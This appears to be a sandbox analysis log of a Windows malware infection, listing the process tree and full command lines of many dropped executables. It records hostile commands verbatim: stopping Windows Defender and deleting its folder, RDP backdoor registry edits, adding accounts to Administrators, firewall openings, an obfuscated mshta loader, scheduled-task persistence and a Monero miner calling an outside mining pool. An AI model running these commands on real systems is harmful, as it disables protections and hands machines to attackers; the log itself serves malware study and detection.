"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:12836

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:13000

C:\Users\Admin\AppData\Local\Temp\657B.exe
C:\Users\Admin\AppData\Local\Temp\657B.exe
1⤵
PID:13160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lqsszzxg\
2⤵
PID:14280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yqipofqx.exe" C:\Windows\SysWOW64\lqsszzxg\
2⤵
PID:12844

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create lqsszzxg binPath= "C:\Windows\SysWOW64\lqsszzxg\yqipofqx.exe /d\"C:\Users\Admin\AppData\Local\Temp\657B.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:13008

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description lqsszzxg "wifi internet conection"
2⤵
PID:13608

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start lqsszzxg
2⤵
PID:10996

C:\Users\Admin\zsnzdsd.exe
"C:\Users\Admin\zsnzdsd.exe" /d"C:\Users\Admin\AppData\Local\Temp\657B.exe"
2⤵
PID:13804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ekfiraav.exe" C:\Windows\SysWOW64\lqsszzxg\
3⤵
PID:12656

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config lqsszzxg binPath= "C:\Windows\SysWOW64\lqsszzxg\ekfiraav.exe /d\"C:\Users\Admin\zsnzdsd.exe\""
3⤵
PID:13860

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start lqsszzxg
3⤵
PID:6804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6204.bat" "
3⤵
- Blocklisted process makes network request
PID:10616

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
PID:13236

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:13780

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4552

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1D9ED9D0D66169D6B1B1908A34A6ED46 C
2⤵
PID:13580

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 01657CDACC262A392CBAA029218FD211
2⤵
PID:8164

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:11136

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FD16D82068A184B1DA4840563BE6D2A9 E Global\MSI0000
2⤵
PID:10344

C:\Users\Admin\AppData\Local\Temp\3C74.exe
C:\Users\Admin\AppData\Local\Temp\3C74.exe
1⤵
PID:13976

C:\Users\Admin\AppData\Local\Temp\3C74.exe
"C:\Users\Admin\AppData\Local\Temp\3C74.exe"
2⤵
PID:11048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:14084

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3744

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:10248

C:\Users\Admin\AppData\Local\Temp\A53C.exe
C:\Users\Admin\AppData\Local\Temp\A53C.exe
1⤵
PID:12824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:9280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\azmxco1b\azmxco1b.cmdline"
3⤵
PID:12952

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8A6.tmp" "c:\Users\Admin\AppData\Local\Temp\azmxco1b\CSCF5B0BDA2D88C4771A75D35A9B23895.TMP"
4⤵
PID:9432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:12028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Loads dropped DLL
PID:9916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:9552

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:12344

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:4064

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:5372

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
PID:7536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:5636

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:8900

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:7396

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:6568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4676

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:11200

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Checks SCSI registry key(s)
PID:10404

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:5452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:7316

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:11568

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:10536

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5424

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:13828

C:\Users\Admin\AppData\Local\Temp\C836.exe
C:\Users\Admin\AppData\Local\Temp\C836.exe
1⤵
PID:13456

C:\Users\Admin\AppData\Local\Temp\D4D9.exe
C:\Users\Admin\AppData\Local\Temp\D4D9.exe
1⤵
PID:13624

C:\Users\Admin\Desktop\CrowdInspect.exe
"C:\Users\Admin\Desktop\CrowdInspect.exe"
1⤵
PID:10248

C:\Users\Admin\Desktop\CrowdInspect64.exe
"C:\Users\Admin\Desktop\CrowdInspect64.exe"
1⤵
PID:10932

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5624

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:2312

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9508

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\E754.exe
C:\Users\Admin\AppData\Local\Temp\E754.exe
1⤵
PID:10524

C:\Users\Admin\AppData\Local\Temp\397C.exe
C:\Users\Admin\AppData\Local\Temp\397C.exe
1⤵
PID:11784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:12704

C:\Users\Admin\AppData\Local\Temp\7609.exe
C:\Users\Admin\AppData\Local\Temp\7609.exe
1⤵
PID:13700

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:13484

C:\Users\Admin\AppData\Local\Temp\8ADA.exe
C:\Users\Admin\AppData\Local\Temp\8ADA.exe
1⤵
PID:13708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 8ADA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8ADA.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:9684

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 8ADA.exe /f
3⤵
- Kills process with taskkill
PID:7508

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:9252

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\D13B.exe
C:\Users\Admin\AppData\Local\Temp\D13B.exe
1⤵
PID:11248

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:12352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11116

C:\Users\Admin\AppData\Local\Temp\753C.exe
C:\Users\Admin\AppData\Local\Temp\753C.exe
1⤵
PID:6892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:12988

C:\Users\Admin\AppData\Local\Temp\C3EA.exe
C:\Users\Admin\AppData\Local\Temp\C3EA.exe
1⤵
PID:11952

C:\Users\Admin\AppData\Local\Temp\1C5C.exe
C:\Users\Admin\AppData\Local\Temp\1C5C.exe
1⤵
PID:14148

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:8352

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 8352
3⤵
PID:11704

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 5732
3⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
2⤵
PID:9508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
3⤵
PID:10288

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.minexmr.com:4444 -u 41xQLBScRp2AYzgDLeA8VqGVh169Bys1VEfjGYS7RWjQLPFqmdudp3d5S1rk1ahLws3rS5r4mqSuyXhFqr2S2qC231EdaBU.RIG01 -p x --algo rx/0
3⤵
PID:12036

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:14008

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10432

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5620

C:\Users\Admin\AppData\Local\Temp\723D.exe
C:\Users\Admin\AppData\Local\Temp\723D.exe
1⤵
PID:13348

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\A41C.exe
C:\Users\Admin\AppData\Local\Temp\A41C.exe
1⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\A41C.exe
C:\Users\Admin\AppData\Local\Temp\A41C.exe
2⤵
PID:13020

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:11248

C:\Users\Admin\AppData\Local\Temp\A41C.exe
"C:\Users\Admin\AppData\Local\Temp\A41C.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:6416

C:\Users\Admin\AppData\Local\Temp\A41C.exe
"C:\Users\Admin\AppData\Local\Temp\A41C.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:12640

C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build2.exe
"C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build2.exe"
5⤵
PID:14092

C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build2.exe
"C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build2.exe"
6⤵
PID:10336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:12008

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5384

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:10968

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:12480

C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build3.exe
"C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build3.exe"
5⤵
PID:9512

C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build3.exe
"C:\Users\Admin\AppData\Local\7bf96b14-eb82-47d9-b0c6-919a2338cf65\build3.exe"
6⤵
PID:592

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:7876

C:\Users\Admin\AppData\Local\Temp\A8B1.exe
C:\Users\Admin\AppData\Local\Temp\A8B1.exe
1⤵
PID:10996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im A8B1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A8B1.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:13096

C:\Windows\SysWOW64\taskkill.exe
taskkill /im A8B1.exe /f
3⤵
- Kills process with taskkill
PID:9652

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:5708

C:\Users\Admin\AppData\Local\Temp\AF97.exe
C:\Users\Admin\AppData\Local\Temp\AF97.exe
1⤵
PID:11476

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\AF97.exe"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if """"== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\AF97.exe"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )
2⤵
- Blocklisted process makes network request
PID:7052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\AF97.exe" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if ""== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\AF97.exe" ) do taskkill -iM "%~nXv" /F
3⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE
7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo
4⤵
PID:12340

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if ""/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo ""== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )
5⤵
PID:9372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if "/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo "== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" ) do taskkill -iM "%~nXv" /F
6⤵
PID:12324

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCrIpT:clOsE ( CReaTeobJecT ( "wscRIPT.sHELl" ). ruN( "CmD /q /r Echo | set /p = ""MZ"" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX & stArT msiexec.exe /y .\LEJ9.uX " , 0 ,TRue ) )
5⤵
PID:13884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r Echo | set /p = "MZ" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX&stArT msiexec.exe /y .\LEJ9.uX
6⤵
PID:11952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
7⤵
PID:14064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>jo4H.q"
7⤵
PID:7396

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\LEJ9.uX
7⤵
PID:12664

C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "AF97.exe" /F
4⤵
- Kills process with taskkill
PID:5080

C:\Users\Admin\AppData\Local\Temp\98FE.exe
C:\Users\Admin\AppData\Local\Temp\98FE.exe
1⤵
PID:10148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:9808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3goevdbe\3goevdbe.cmdline"
3⤵
PID:4056

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4700.tmp" "c:\Users\Admin\AppData\Local\Temp\3goevdbe\CSCD364563776114C058CE6CD171B849DAF.TMP"
4⤵
PID:10948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:10440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:12184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:7756

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1388

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:12604

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:5328

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
PID:10388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:6876

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:6776

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:14332

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:9996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4732

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:4412

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:9084

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:13408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3956

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:7120

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\1014.exe
C:\Users\Admin\AppData\Local\Temp\1014.exe
1⤵
PID:7972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:13284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:13724

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6288

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:13640

C:\Users\Admin\Desktop\CrowdInspect.exe
"C:\Users\Admin\Desktop\CrowdInspect.exe"
1⤵
PID:5024

C:\Users\Admin\Desktop\CrowdInspect64.exe
"C:\Users\Admin\Desktop\CrowdInspect64.exe"
2⤵
PID:8020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:11296

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:14112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7740

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:13160

C:\Users\Admin\Desktop\CrowdInspect.exe
